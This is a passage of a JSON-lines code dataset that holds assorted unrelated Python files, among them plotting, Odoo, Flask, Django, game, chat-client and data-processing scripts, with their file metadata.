linewidth = 2.0, linestyle = '-', label = 'cosine')\nplt.plot(x, S, color = 'red', linewidth = 3.0, linestyle = '-', label = 'sine')\nplt.legend(loc='upper left', frameon=True)\n# Set x_limits\nplt.xlim(x.min()*1.1, x.max()*1.1)\n #Set y_lim\nplt.ylim(C.min()*1.1, C.max()*1.1)\n\n #set yticks\nplt.yticks([-1, 0, +1], [r'$-1$', r'$0$', r'$+1$'])\n #set xticks\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$+\\pi/2$', r'$+\\pi$'])\n\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom')\nax.spines['bottom'].set_position(('data', 0))\nax.yaxis.set_ticks_position('left')\nax.spines['left'].set_position(('data', 0))\n\n\n\n #save figure using 72n dots per inch\nplt.savefig('plot3.pdf', dpi = 720)\n\n #show results on screen\nplt.show()\nplt.close()\n\n","sub_path":"sincos.py","file_name":"sincos.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"599829652","text":"#!/home/xulei/Downloads/Python-3.5.1/python\n#!conding:utf-8\n\nimport json\nimport urllib.request\nimport urllib.parse\n\ndef gettime():\n url = 'http://api.k780.com/?app=life.time&appkey=10003&sign=b59bc3ef6191eb9f747dd4e83c99f2a4&format=json'\n response = urllib.request.urlopen(url)\n html = response.read().decode('utf-8')\n target= json.loads(html)\n #print(target['result']['datetime_2'])\n #print(target['result']['week_2'])\n output='''

'''+target['result']['datetime_2']+\"

\"\n output1='''

'''+target['result']['week_2']+\"

\"\n print (output,output1)\nif __name__ == \"__main__\":\n gettime()\n \n","sub_path":"ServerRoot/cgi/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"39154419","text":"# -*- coding: utf-8 -*-\n\nimport time\nfrom odoo import api, fields, models, _\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\n\n\nclass InventoryAdjustment(models.Model):\n\t_inherit = 'stock.inventory'\n\n\tforce_date = fields.Datetime(string=\"Force Date\")\n\nclass StockPicking(models.Model):\n\t_inherit = 'stock.picking'\n\n\tforce_date = fields.Datetime(string=\"Force Date\")\n\n\nclass StockMove(models.Model):\n\t_inherit = 'stock.move'\n\n\tdef _action_done(self, cancel_backorder=False):\n\t\tforce_date = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n\t\tif self.env.user.has_group('stock_force_date_app.group_stock_force_date'):\n\t\t\tfor move in self:\n\t\t\t\tif move.picking_id:\n\t\t\t\t\tif move.picking_id.force_date:\n\t\t\t\t\t\tforce_date = move.picking_id.force_date\n\t\t\t\t\telse:\n\t\t\t\t\t\tforce_date = move.picking_id.scheduled_date\n\t\t\t\tif move.inventory_id:\n\t\t\t\t\tif move.inventory_id.force_date:\n\t\t\t\t\t\tforce_date = move.inventory_id.force_date\n\t\t\t\t\telse:\n\t\t\t\t\t\tforce_date = move.inventory_id.date\n\n\t\tres = super(StockMove, self)._action_done()\n\t\tif self.env.user.has_group('stock_force_date_app.group_stock_force_date'):\n\t\t\tif force_date:\n\t\t\t\tfor move in res:\n\t\t\t\t\tmove.write({'date':force_date})\n\t\t\t\t\tif move.move_line_ids:\n\t\t\t\t\t\tfor move_line in move.move_line_ids:\n\t\t\t\t\t\t\tmove_line.write({'date':force_date})\n\t\t\t\t\tif move.account_move_ids:\n\t\t\t\t\t\tfor account_move in move.account_move_ids:\n\t\t\t\t\t\t\taccount_move.write({'date':force_date})\n\t\t\t\t\t\t\tif move.inventory_id:\n\t\t\t\t\t\t\t\taccount_move.write({'ref':move.inventory_id.name})\n\n\t\treturn res\n","sub_path":"stock_force_date_app/models/stock_inventory.py","file_name":"stock_inventory.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"315679470","text":"# Copyright (c) 2012-2013, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom aws import Action\n\nservice_name = 'Amazon Elastic MapReduce'\nprefix = 'elasticmapreduce'\n\nAddInstanceGroups = Action(prefix, 'AddInstanceGroups')\nAddJobFlowSteps = Action(prefix, 'AddJobFlowSteps')\nDescribeJobFlows = Action(prefix, 'DescribeJobFlows')\nModifyInstanceGroups = Action(prefix, 'ModifyInstanceGroups')\nRunJobFlow = Action(prefix, 'RunJobFlow')\nSetTerminationProtection = Action(prefix, 'SetTerminationProtection')\nTerminateJobFlows = Action(prefix, 'TerminateJobFlows')\n","sub_path":"awacs/elasticmapreduce.py","file_name":"elasticmapreduce.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"70023928","text":"import RPi.GPIO as GPIO\r\nimport time\r\nimport keyboard\r\nimport sys, tty, termios\r\n\r\ndef main():\r\n GPIO.setmode(GPIO.BCM)\r\n GPIO.setwarnings(False)\r\n # Pin being used to control gun firing\r\n GPIO.setup(18, GPIO.OUT)\r\n\r\n print(\"3 Second Burst\")\r\n \r\n GPIO.output(18, GPIO.HIGH)\r\n time.sleep(3)\r\n GPIO.output(18, GPIO.LOW)\r\n\r\n print(\"End\")\r\n\r\n \r\ndef getch():\r\n fd = sys.stdin.fileno()\r\n old_settings = 
termios.tcgetattr(fd)\r\n try:\r\n tty.setraw(sys.stdin.fileno())\r\n ch = sys.stdin.read(1)\r\n finally:\r\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\r\n return ch\r\n\r\nmain()\r\n","sub_path":"3secburst.py","file_name":"3secburst.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"520428455","text":"# coding: utf-\n\nfrom datetime import datetime\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib import cm as cm\nget_ipython().magic(u'matplotlib inline')\nimport scipy.interpolate\nimport pandas as pd\n\nimport shapefile, sys\nimport os\nfrom matplotlib.path import Path\nfrom matplotlib.patches import PathPatch\nfrom matplotlib.ticker import MaxNLocator\nimport pyproj\nimport json\n\n# read in shapefile\nsf = shapefile.Reader(os.getcwd() + '/' + 'shape/tl_2013_us_zcta510.shp')\n\n#read json as a string\njson_file = open('shape/us_zip.json')\njson_str = json_file.read()\n\n#convert to dictionary\njson_data = json.loads(json_str)\n\n#read in nyc zips\ndf = pd.read_csv('zip_borough.csv')\n\n# make a list of the zips\nNY_zips = df['Incident Zip'].tolist()\n\n#create dictionary for nyc\nnyc_zips = {}\nnyc_zips['type'] = u'FeatureCollection'\nnyc_zips['features'] = []\n\n#loop through nys dictionary and keep entries where city is New York\nfor i in json_data['features']:\n if int(i['properties']['ZCTA5CE10']) in NY_zips:\n nyc_zips['features'].append(i)\n\n# save dictionary as json\nwith open('nyc_zips.json', 'w') as outfile:\n json.dump(d, outfile)\n\n# to create a new dictionary with zips is indices and bbox and clean coorinates included\nd = {}\nfor e in nyc['features']:\n bbox = []\n # unravel cleanly\n x = np.vstack([np.array(i).ravel().reshape(-1, 2) for i in e['geometry']['coordinates']])\n # get min lng and min lat\n minx = np.min(x,axis=0)\n # get max lng and max lat\n maxx = np.max(x,axis=0)\n bbox = np.r_[minx,maxx].tolist()\n e['geometry'][u'bbox'] = bbox\n e['geometry'][u'shape'] = x.tolist()\n zip_code = e['properties']['ZCTA5CE10']\n d[zip_code] = e\n\nwith open('nyc_zips_n.json') as f:\n nyc = json.load(f)\n\n# create an rtree to hold the shapes of zips\nfrom rtree import index\n\nidx = index.Index()\nfile_idx = index.Rtree('rtree')\n\n# insert the bounding boxes into the rtree\nfor i in nyc:\n bbox = nyc[i]['geometry']['bbox']\n zipc = nyc[i]['properties']['ZCTA5CE10']\n idx.insert(int(zipc),tuple(bbox))\n file_idx.insert(int(zipc),tuple(bbox))\n\n# test a point\nhits = list(idx.intersection((-73.995516, 40.728137)))\nhits\n# 40.728137, -73.995516\n# -73.986493, 40.693264\n\nimport matplotlib.path as mplPath\n\n# if point has 2 hits, determine which zipcode it falls under\n# bbPath = mplPath.Path(nyc[str(hits[0])]['geometry'['shape']])\n\nreal_zip = 0\nfor i in hits:\n bbPath = mplPath.Path(nyc[str(i)]['geometry']['shape'])\n if bbPath.contains_point((-73.995516, 40.728137)):\n real_zip = i\n\nreal_zip\n\nweather = pd.read_csv('weather_final.csv')\n\n# weather\n\n# load the tree from file\nidx = index.Rtree('rtree')\n\n","sub_path":"Join_Taxi_Weather/json_rtree_zipcodes.py","file_name":"json_rtree_zipcodes.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651997807","text":"import flask\n\nfrom infrastructure.view_modifiers import response\nfrom services import video_service\nfrom 
viewmodels.videos.add_video_viewmodel import AddVideoViewModel\nfrom viewmodels.videos.category_viewmodel import CategoryViewModel\nfrom viewmodels.videos.play_viewmodel import PlayViewModel\n\nblueprint = flask.Blueprint('videos', __name__, template_folder='templates')\n\n\n@blueprint.get('/videos/category/')\n@response(template_file='videos/category.html')\ndef category(cat_name: str):\n vm = CategoryViewModel(cat_name)\n return vm.to_dict()\n\n\n@blueprint.get('/videos/play/')\n@response(template_file='videos/play.html')\ndef play(video_id: str):\n vm = PlayViewModel(video_id)\n return vm.to_dict()\n\n\n@blueprint.get('/videos/add/')\n@response(template_file='videos/partials/add_video_form.html')\ndef add_get(cat_name: str):\n vm = AddVideoViewModel(cat_name)\n return vm.to_dict()\n\n\n@blueprint.post('/videos/add/')\ndef add_post(cat_name: str):\n vm = AddVideoViewModel(cat_name)\n vm.restore_from_form()\n\n video_service.add_video(cat_name, vm.id, vm.title, vm.author, vm.view_count)\n\n return flask.redirect(f'/videos/category/{cat_name}')\n\n\n@blueprint.get('/videos/cancel_add/')\n@response(template_file='videos/partials/show_add_form.html')\ndef cancel_add(cat_name: str):\n vm = AddVideoViewModel(cat_name)\n return vm.to_dict()\n","sub_path":"code/ch5_partials/ch5_final_video_collector/views/videos.py","file_name":"videos.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45160574","text":"from hashlib import sha256\n\nfrom orycha_db import db\nfrom bson.objectid import ObjectId\nfrom bson.json_util import dumps\nimport pymongo\nservus = db.orycha_servus\n\n\nclass Orycha:\n length = 0\n\n def __init__(self, **kwargs):\n self.token_id = self.get_last_entry_field(field='token_id')\n self.name = kwargs['name']\n self.difficulty = 0\n self.parent_id = self.get_last_entry_field()\n self.parent_hash = self.hash_parent()\n self.data = {}\n\n def __str__(self):\n return 'Orycha -> {}'.format(self.name)\n\n def __repr__(self):\n return 'Orycha #{}'.format(self.token_id)\n\n @classmethod\n def create(cls, **kwargs):\n s = cls(**kwargs)\n servus.insert_one(s.as_dict())\n s._id = str(s._id)\n return s\n\n @classmethod\n def get(cls, **kwargs):\n return servus.find_one(kwargs)\n\n @classmethod\n def get_all(cls, **kwargs):\n cur = servus.find(kwargs)\n nodes_dict = dict()\n for c in cur:\n c['_id'] = str(c['_id'])\n nodes_dict[c['token_id']] = c\n\n return nodes_dict\n\n @classmethod\n def set_data(cls, token_id, data):\n node = servus.find_one({'token_id': token_id})\n difficulty = 0 if not node.get('difficulty') else node['difficulty']\n _ = servus.update_one({'token_id': token_id},\n {'$set': {\n 'data': data\n }})\n current_hash = hash_node(token_id, difficulty=difficulty)\n difficulty += 1\n if difficulty > 9:\n difficulty -= 9\n node = servus.update_one({'token_id': token_id},\n {'$set': {\n 'hash': current_hash,\n 'difficulty': difficulty,\n }})\n return node\n\n @classmethod\n def delete(cls, search_by):\n node = servus.delete_one(search_by)\n return node\n\n def as_dict(self):\n return self.__dict__\n\n def hash_parent(self):\n parent_id = ObjectId(self.parent_id)\n parent = servus.find_one({'_id': parent_id})\n if not parent:\n return\n return sha256(dumps(parent).encode()).hexdigest()\n\n def get_last_entry_field(self, field='_id'):\n cur = servus.find({}).sort('_id', pymongo.DESCENDING).limit(1)\n for c in cur:\n last = c\n break\n\n if not last:\n return 0\n\n if field == '_id':\n 
return str(last['_id'])\n else:\n return last[field] + 1\n\n\ndef hash_node(token_id, difficulty):\n node = servus.find_one({'token_id': token_id})\n digest = sha256(dumps(node).encode()).hexdigest()\n nonce = 0\n while digest[:2] != str(difficulty) * 2:\n node['nonce'] = nonce\n digest = sha256(dumps(node).encode()).hexdigest()\n nonce += 1\n return digest\n","sub_path":"orycha.py","file_name":"orycha.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"79501153","text":"import random\nimport curses\n\ninput('Le jeu se joue avec les touches WASD, appuyez sur ENTER pour débuter')\n\n# Initialisation de curses\ncrs = curses.initscr()\n\n# Disable le curseur\ncurses.curs_set(0)\n# Disable l'Affichage de la touche appuyée\ncurses.noecho()\ncurses.cbreak()\n\n# Retourne les dimensions maximales que peut avoir la fenetre\nscreen_height, screen_width = crs.getmaxyx()\n\n# Initialise la fenêtre\nwindow = curses.newwin(screen_height, screen_width, 0, 0)\n\n# Accept les entrées de clavier\nwindow.keypad(1)\n\n# Refreshrate\nwindow.timeout(100)\n\n# Position de départ du snake\nsnake_y = screen_height//2\nsnake_x = screen_width//4\n\n# List contenant la \"queue\" du snake (list de positions)\nsnake = [\n [snake_y, snake_x],\n [snake_y, snake_x-1]\n]\n\n# Objet de la pomme au centre de la page\napple = [screen_height//2, screen_width//2]\n\n# Ajout de l'objet à la fenêtre\nwindow.addch(apple[0], apple[1], curses.ACS_DIAMOND)\n\n# Boucle qui gère le jeux ----------------------------------------------------------------------\nkey = curses.KEY_RIGHT\n\nwhile True:\n # Lecture d'une entrée (une seule entrée gardée en mémoire en même temps)\n next_key = window.getch()\n # Garde la même key si aucune autre n'a été appuyée depuis le dernier refresh\n key = key if next_key == -1 else next_key\n\n # Vérifie si le joueur à perdu -------------------------------------------------------------\n # Si le joueur sort du jeux\n if snake[0][0] in [0, screen_height-1] or snake[0][1] in [0, screen_width-1] :\n curses.endwin()\n print('Vous avez perdu')\n quit()\n\n # Si le joueur se mange lui-même\n if snake[0] in snake[1] :\n curses.endwin()\n print('Vous avez perdu')\n quit()\n\n\n # Mouvement du snake ----------------------------------------------------------------------\n new_pos = [snake[0][0], snake[0][1]]\n\n # W = 119, S = 115, A = 97, D = 100\n if key == 119 :\n new_pos[0] -= 1\n if key == 115:\n new_pos[0] += 1\n if key == 97 :\n new_pos[1] -= 1\n if key == 100 :\n new_pos[1] += 1\n\n # Insert la nouvelle position en premier, pop la dernière\n snake.insert(0, new_pos)\n\n # Si snake mange la pomme -----------------------------------------------------------------\n if snake[0] == apple :\n # Suprime la pomme\n apple = None\n\n # Initialise une nouvelle pomme\n while apple is None:\n new_apple = [\n random.randint(5, screen_height - 5),\n random.randint(5, screen_width - 5)\n ]\n #Vérifie que la nouvelle pomme n'est pas dans le snake, sinon repart l'init\n apple = new_apple if new_apple not in snake else None\n\n window.addch(apple[0], apple[1], curses.ACS_DIAMOND)\n else:\n # On pop juste si snake n'a pas mangé la pomme pour simuler le mouvement.\n # S'il a manger la pomme, le manque de pop fait comme un ajout\n old_pos = snake.pop()\n # Remplacer la dernière position de la queue du snake par un espace vide\n window.addch(old_pos[0], old_pos[1], ' ')\n\n window.addch(snake[0][0], snake[0][1], 
curses.ACS_CKBOARD)","sub_path":"snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"22307683","text":"# Create a program to ask the user their name, ask them guess the number I am thinking of between 1 and 10\n\n# Import random module\nimport random\n# Say Hello and get the users name\nmyName = input (\"Hello! What is your name? \")\n# Assign the variable 'number' to a random integer between 1 and 10\nnumber = random.randint(1,10)\n# Tell the user I am thinking of a number between 1 and 10\nprint (\"Well, \" + myName + \" I am thinking of a number between 1 and 10.\")\n# Take the guess from the users keyboard input \nguess = int(input( \"Take a guess: \"))\nif guess == number: \n print(\"Good job, \" + myName + \"! You guessed my number.\")\nif guess != number:\n print (\"Better luck next time.\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596421085","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 5 09:03:36 2016\n\n@author: ac1513\n\"\"\"\n\nsampleMap = {}\nkmers = []\n\nfile = open('AWNx_filenames.txt', 'r') #contains the names of the files created in the previous step\n\n#building the sampleMap of kmers and samples\nfor line1 in file: #for each txt file created in step 5\n if line1 == '':\n break\n line1 = line1.strip()\n AWNx_file = open(str(line1+'.txt'))\n contig = line1[:-5]\n for line in AWNx_file: #for kmer/sample \n kmer, sample = line.split() \n if kmer not in sampleMap: #for each a new kmer\n sampleMap[kmer] = set() #add the kmer to the dictionary and create new set \n sampleMap[kmer].add(contig) #add the contig data to the set\n else:\n sampleMap[kmer].add(contig) #kmer already exists, so add contig\n if kmer not in kmers:\n kmers.append(kmer) #add the kmer to list for use later\n \nlen_file = sum(1 for line in open('AWNx_filenames.txt'))\n\nfor x in range(0,len(kmers)-1): #x used for first kmer to compare\n for i in range(x+1,len(kmers)): #i used for second kmer to compare - doesn't compare ones already compared in other order\n frequency = len(sampleMap[kmers[x]].intersection(sampleMap[kmers[i]]))/(len_file) #calculate the frequency of the two co-occuring\n if frequency != 0: #ignore any 0's\n print(kmers[x],'\\t',kmers[i],'\\t',frequency)\n\n","sub_path":"06_frequencyKmers.py","file_name":"06_frequencyKmers.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"248830752","text":"#!/usr/bin/env python\nimport json\nimport re\n\n\ndef main():\n with open('out/england_article.json') as file:\n article = json.loads(file.readline())\n text = article.get('text')\n\n pattern = r'\\[\\[Category:(.*)\\]\\]'\n categories = re.findall(pattern, text)\n for category in categories:\n print(category)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/03_regeular_expression/22_extract_category_names.py","file_name":"22_extract_category_names.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"646528680","text":"import argparse\n\nimport sys\n\nimport chat_server\n\n\ndef define_args(arg_vec):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--host', type=str, default=\"0.0.0.0\")\n 
parser.add_argument('--port', type=int, default=\"33333\")\n\n _args = parser.parse_args(arg_vec)\n return _args\n\n\nif __name__ == \"__main__\":\n args = define_args(arg_vec=sys.argv[1:])\n\n chat_server.service.serve((args.host, args.port))\n","sub_path":"assets/codes/python/2020-03-16-grpc3/run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"161335784","text":"import pandas as pd\nimport re\nimport logging\nfrom tqdm import tqdm\nfrom typing import List, Dict\n\n\ndef read_df(names: List[str],\n cols_dtypes: object = None\n ) -> Dict[str, pd.DataFrame]:\n dict_dfs = {}\n logger = logging.getLogger(__name__)\n\n for name in tqdm(names):\n\n def strip_name(name:str) -> str:\n return re.sub(r'.*__|.*/', '', name).split('.', 1)[0]\n\n if name.endswith('.csv?dl=1') or name.endswith('.csv'):\n dict_dfs.update({strip_name(name): pd.read_csv(name, dtype=cols_dtypes)})\n logger.info('name: {0} -- shape: {1}'.format(name, len(dict_dfs)))\n\n elif name.endswith('.h5'):\n dict_dfs.update({strip_name(name): pd.read_hdf(name, dtype=cols_dtypes)})\n print('h5')\n\n else:\n logger.info('Nothing to read')\n\n return dict_dfs\n","sub_path":"notebooks/adase/utils/pandas/read_df.py","file_name":"read_df.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"268294126","text":"from sklearn import svm\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import GridSearchCV\nimport re\nimport nltk\n# nltk.download_shell()\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import *\nstemmer = PorterStemmer()\nfrom nltk.stem.snowball import SnowballStemmer\nfrom multiprocessing import Pool\nimport asyncio\nimport sys\n\npool = Pool()\n\nfriendsModel = joblib.load('../machineLearner/politicsPrediction.pkl')\neachFriendWord = []\nfriendDictionary = {}\neachFriendSer = []\nfriendCategorisation = []\n\nf = open('../machineLearner/politicsFriends.txt', 'r')\ndictionaryString = f.read()\ndictionaryList = dictionaryString.split(' ')\n\nasync def serialiseFriends(friendsArray, trainingModel):\n serialisedFriends = []\n for word in trainingModel:\n if word in friendsArray:\n serialisedFriends.append(1)\n else:\n serialisedFriends.append(0)\n return serialisedFriends\n\nasync def predict(friendsArray):\n male = 0\n female = 0\n serialisedFriends = await serialiseFriends(friendsArray, dictionaryList)\n probability = friendsModel.predict_proba([serialisedFriends])\n print(probability[0][1])\n\nfriendsArray = sys.argv[1].split(';')\nloop = asyncio.get_event_loop()\nloop.run_until_complete(predict(friendsArray))\nloop.close()\n\n","sub_path":"machineLearner/friendPredictor.py","file_name":"friendPredictor.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"303581212","text":"#!/usr/bin/env python\r\n\r\nfrom socket import *\r\n\r\nHOST = input('input your host: ')\r\nif not HOST:\r\n HOST = '127.0.0.1'\r\nPORT = input('input your port: ')\r\nif not PORT:\r\n PORT = 21567\r\nelse:\r\n PORT = int(PORT)\r\nBUFSIZ = 1024\r\nADDR = (HOST, PORT)\r\nudpCliSock = socket(AF_INET, SOCK_DGRAM)\r\n\r\nwhile True:\r\n data = input(\"> \")\r\n if not data:\r\n break\r\n udpCliSock.sendto(data.encode(), ADDR)\r\n data, ADDR = udpCliSock.recvfrom(BUFSIZ)\r\n data = 
data.decode()\r\n if not data:\r\n break\r\n print(data)\r\nudpCliSock.close()\r\n","sub_path":"PythonCoreCourse3/ex2/tsUclnt3.py","file_name":"tsUclnt3.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317822756","text":"from django.conf.urls.defaults import patterns, url\n\nurlpatterns = patterns(\"points.views\",\n url(r\"^$\", \"index\"),\n\n url(r\"^event/new/$\", \"new_event\"),\n url(r\"^event/(\\d+)/$\", \"event_detail\"),\n url(r\"^event/(\\d+)/edit/$\", \"edit_event\"),\n url(r\"^event/(\\d+)/label/edit/$\", \"edit_event_label\"),\n url(r\"^event/label/(.*)/$\", \"events_by_label\"),\n url(r\"^labels/$\", \"all_labels\"),\n\n url(r\"^event/(\\d+)/article/new/$\", \"new_article\"),\n url(r\"^article/(\\d+)/vote/(up|down)/$\", \"vote_article\"),\n\n url(r\"^articles/$\", \"all_articles\"),\n url(r\"^article/domain/(.*)/$\", \"articles_by_domain\"),\n\n url(r\"^register/$\", \"register\"),\n url(r\"^welcome/$\", \"welcome\"),\n url(r\"^user/(.*)/$\", \"user\"),\n url(r\"^users/$\", \"users\"),\n)\n\nurlpatterns += patterns(\"\",\n url(r\"^login/$\", \"django.contrib.auth.views.login\", {\"template_name\": \"login.html\"}),\n url(r\"^logout/$\", \"django.contrib.auth.views.logout\", {\"next_page\": \"/\"}),\n)\n","sub_path":"points/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157491219","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/dataclay/util/tools/python/PythonMetaClassFactory.py\n# Compiled at: 2019-11-11 07:06:07\n# Size of source mod 2**32: 3796 bytes\n\"\"\" Class description goes here. 
\"\"\"\nfrom dataclay import DataClayObject\nfrom importlib import import_module\nimport logging\nfrom dataclay.commonruntime.ExecutionGateway import loaded_classes\nimport dataclay.util.management.classmgr.UserType as UserType\nfrom dataclay.exceptions.exceptions import DataClayException\nimport traceback\n__author__ = 'Alex Barcelo ', methods=['GET', 'POST'])\ndef newRequest(req):\n\n\tif request.method == 'GET':\n\t\treturn render_template('fetch-data.html', req=req)\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\t\n\t\t\tuserId = request.form['textUserId']\n\t\t\tcountry = request.form['selectCountry']\n\n\t\t\t# employee = session.query(Employee).filter_by(\n\t\t\t# \tuserId = request.form['textUserId'],\n\t\t\t# \tcountry = request.form['selectCountry']).first()\n\t\t\temployee = checkUserIBM(userId+country)\n\n\t\t\tif employee['result'] == \"OK\":\n\t\t\t\tdata = employee['data']\n\n\t\t\t\tif req == \"Extension\":\n\t\t\t\t\treturn render_template('new-extension.html', emp=data)\n\t\t\t\tif req == \"Analog Line\":\n\t\t\t\t\treturn render_template('new-analogLine.html', emp=employee)\n\t\t\t\tif req == \"Hunt Group\":\n\t\t\t\t\treturn render_template('new-huntgroup.html', emp=employee)\n\t\t\t\tif req == \"Pickup Group\":\n\t\t\t\t\treturn render_template('new-pickupgroup.html', emp=employee)\n\t\t\t\tif req == \"CMC\":\n\t\t\t\t\treturn render_template('new-cmc.html', emp=employee)\n\t\t\t\tif req == \"FAC\":\n\t\t\t\t\treturn render_template('new-fac.html', emp=employee)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\terror = \"User Id doesn't exist in the database.\"\n\t\t\t\treturn render_template('fetch-data.html', req=req, error=error)\n\n\n#New Extension Request\n@app.route('/loadRequest', methods=['GET', 'POST'])\ndef newExtensionReq():\n\n\tif request.method == 'POST':\n\t\tdateCreated = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\t\treq = request.form['textRequest']\n\t\tsUUID = str(uuid.uuid1())\n\t\t#print (\"Token: %s\", %sUUID)\n\n\t\tdata = Request(\n\t\t\tuserId = request.form['textUserId'],\n\t\t\ttoken = sUUID,\n\t\t\tmail = request.form['textMail'],\n\t\t\tname = request.form['textName'],\n\t\t\tlastname = request.form['textLastname'],\n\t\t\tfullName = request.form['textFullName'],\n\t\t\trequest = req,\n\t\t\tapprovalLevel = 1,\n\t\t\trequestType = \"new\",\n\t\t\tcountry = request.form['textCountry'],\n\t\t\tsection = \"123\",\n\t\t\tstatus = \"Pending of Manager\",\n\t\t\tdateCreated = dateCreated,\n\t\t\tfirstManagerId = request.form['textManagerId'],\n\t\t\tfirstManagerFullName = request.form['textManager'],\n\t\t\tfirstManagerMail = request.form['textManagerMail'],\n\t\t\tsite = request.form['selectSite'],\n\t\t\tlocation = request.form['textLocation'],\n\t\t\tcontactNumber = request.form['textContactNumber'],\n\t\t\tjustification = request.form['textJustification'])\n\t\n\t\tsession.add(data)\n\t\tsession.commit()\n\t\tsession.refresh(data)\n\n\t\tsUUID = str(uuid.uuid1())\n\n\t\tif req == \"Extension\":\n\t\t\tinfo = Extension(\n\t\t\t\tphone = request.form['selectPhone'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\tvoicemail = request.form['selectVoiceMail'],\n\t\t\t\tdialPermission = request.form['selectDialPermission'],\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"Analog Line\":\n\t\t\tinfo = AnalogLine(\n\t\t\t\tphone = request.form['selectPhone'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\tvoicemail = request.form['selectVoiceMail'],\n\t\t\t\tdialPermission = 
request.form['selectDialPermission'],\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"Hunt Group\":\n\t\t\tinfo = HuntGroup(\n\t\t\t\tgroup = request.form['textGroup'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"Pickup Group\":\n\t\t\tinfo = PickupGroup(\n\t\t\t\tgroup = request.form['textGroup'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"CMC\":\n\t\t\tinfo = CMC(\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"FAC\":\n\t\t\tinfo = FAC(\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tdescription = \"\"+dateCreated+\" - \"+request.form['textFullName']+\" has requested \"+req+\". \" \\\n\t\t\t\t\"Status: Pending of Manager\"\n\n\t\tload_log(dateCreated, request.form['textUserId'], request.form['textFullName'], \n\t\t\tdata.ticket, req, \"Pending of Manager\", description)\n\n\n\t\treturn 